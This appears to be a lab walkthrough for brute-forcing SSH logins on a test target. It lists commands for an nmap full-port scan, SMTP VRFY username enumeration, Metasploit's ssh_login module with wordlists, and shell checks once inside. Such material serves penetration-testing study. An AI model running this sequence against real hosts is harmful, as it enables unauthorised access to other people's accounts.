SSH Brute-Force

SSH is generally secure due to its use of encryption, but its authentication layer can still be compromised through weak or reused passwords. This attack uses Metasploit's ssh_login module to systematically test username and password combinations against a target, gaining access whenever a valid credential pair is found. Before running the attack, wordlists containing candidate usernames and passwords should be prepared in advance.

Discovery

Command Description
nmap -A -p- -T5 [target IP] Scans all ports with service versions and OS detection; SSH (22) is identified as open.

Enumeration

Command Description
smtp-user-enum -M VRFY -U /usr/share/wordlists/fern-wifi/common.txt -t [target IP] Queries the SMTP server's VRFY command with each username in the wordlist, revealing which ones actually exist on the system — providing verified usernames to use in the SSH brute-force attempt instead of guessing blindly.

Attack

Command Description
msfconsole Launches the Metasploit Framework console.
search ssh Searches for modules related to SSH.
use auxiliary/scanner/ssh/ssh_login Selects the SSH login brute-force scanner module.
show options Displays the required parameters for the module.
set rhosts [target IP] Sets the target's IP address.
set USER_FILE /usr/share/wordlists/sshusers.txt Verified usernames discovered via SMTP enumeration.
set PASS_FILE /usr/share/wordlists/sshpassword.txt Sets the wordlist file containing candidate passwords to try.
exploit Launches the brute-force attempt in the foreground, showing each username/password combination as it's tried.

Verification

Command Description
sessions -l Lists active sessions.
sessions -i [id] Connects to the session opened with the discovered credentials.
whoami Confirms which user account and credentials were discovered — in this case, msfadmin rather than root.
uname -a Displays the target system's kernel information.
ls Confirms file access within the compromised account.

Tool Used

This attack was carried out using Metasploit Framework — see the full command reference here.